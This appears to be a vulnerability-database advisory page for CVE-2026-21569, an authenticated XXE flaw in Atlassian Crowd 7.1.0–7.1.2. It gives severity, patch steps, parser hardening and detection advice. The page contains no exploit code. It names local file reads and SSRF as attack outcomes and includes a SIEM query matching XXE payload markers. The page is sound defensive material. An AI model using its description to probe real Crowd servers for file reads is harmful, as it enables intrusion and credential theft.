CVE-2026-21569 – This XXE vulnerability in Crowd Data Center and... (How to Fix)

Q: What is the severity of CVE-2026-21569?

CVE-2026-21569 has a CVSS score of 7.9 (HIGH). This XXE vulnerability in Crowd Data Center and Server allows authenticated attackers to read local files and potentially access remote content via XML parsing. It affects organizations running Crowd versions 7.1.0 through 7.1.2, potentially leading to data exposure and service disruption.

📋 TL;DR

This XXE vulnerability in Crowd Data Center and Server allows authenticated attackers to read local files and potentially access remote content via XML parsing. It affects organizations running Crowd versions 7.1.0 through 7.1.2, potentially leading to data exposure and service disruption.

💻 Affected Systems

Products:

Atlassian Crowd Data Center
Atlassian Crowd Server

Versions: 7.1.0 through 7.1.2

Operating Systems: All supported platforms

Default Config Vulnerable: ⚠️ Yes

Notes: Requires authenticated access to exploit. All deployments with affected versions are vulnerable by default.

📦 What is this software?

Crowd by Atlassian

View all CVEs affecting Crowd →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attacker reads sensitive system files (passwords, configs), accesses internal network resources via SSRF, and causes denial of service through resource exhaustion.

🟠

Likely Case

Authenticated attacker reads application configuration files, potentially exposing credentials and internal system information.

🟢

If Mitigated

With proper network segmentation and XML parsing restrictions, impact limited to local file read within application context.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

XXE exploitation is well-documented with standard techniques. Requires authenticated user access to vulnerable XML parsing endpoints.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 7.1.3 or later

Vendor Advisory: https://confluence.atlassian.com/pages/viewpage.action?pageId=1712324819

Restart Required: Yes

Instructions:

1. Backup your Crowd instance. 2. Download Crowd 7.1.3+ from Atlassian download center. 3. Stop Crowd service. 4. Install/upgrade to patched version. 5. Restart Crowd service. 6. Verify upgrade via admin console.

🔧 Temporary Workarounds

Disable XXE Processing

all

Configure XML parsers to disable external entity resolution

Configure XML parser settings in Crowd configuration to set features: FEATURE_SECURE_PROCESSING=true, disallow-doctype-decl=true

🧯 If You Can't Patch

Restrict network access to Crowd instances, especially from untrusted networks
Implement WAF rules to block XXE payload patterns in XML requests

🔍 How to Verify

Check if Vulnerable:

Check Crowd version via admin console or application logs. Versions 7.1.0-7.1.2 are vulnerable.

Check Version:

Check Crowd admin console or application startup logs for version information

Verify Fix Applied:

Verify version is 7.1.3 or later via admin interface and test XML parsing endpoints with XXE test payloads.

📡 Detection & Monitoring

Log Indicators:

Unusual XML parsing errors
Large XML file uploads
Requests to internal file paths in XML payloads

Network Indicators:

XML requests containing external entity references
Outbound connections from Crowd to unexpected internal systems

SIEM Query:

source="crowd" AND (message="*DOCTYPE*" OR message="*ENTITY*" OR message="*SYSTEM*")

📊 Metadata

CVE ID: CVE-2026-21569

CVSS v3 Score: 7.9 (HIGH)

CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:L/A:H

CWE: CWE-611

EPSS Score: 0.06% exploit probability (18.5th percentile)

Published: January 28, 2026

Last Updated: February 2, 2026

🔗 References

https://confluence.atlassian.com/pages/viewpage.action?pageId=1712324819 Vendor Advisory
https://jira.atlassian.com/browse/CWD-6453 Vendor Advisory,Issue Tracking

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2026-21569, you might also want to check these: